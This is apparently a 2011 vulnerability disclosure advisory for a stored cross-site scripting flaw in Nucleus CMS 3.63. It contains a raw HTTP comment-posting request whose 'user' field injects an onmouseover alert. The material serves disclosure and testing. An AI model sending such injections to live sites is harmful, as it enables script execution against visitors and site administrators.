------------------------------------------------------------------------
Software................Nucleus CMS 3.63
Vulnerability...........Persistent Cross-site Scripting
Threat Level............Moderate (2/5)
Download................http://nucleuscms.org/
Vendor Contact Date.....3/10/2011
Disclosure Date.........3/24/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--PoC--

POST http://localhost/nucleus3.63/index.php?itemid=1 HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/nucleus3.63/index.php?itemid=1
Content-Length: 119
Cache-Control: max-age=0
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

action=addcomment&url=index.php%3Fitemid%3D1&itemid=1&body=xxx&user="onmouseover="alert(0)"&userid=zzzz&email=x%40x.com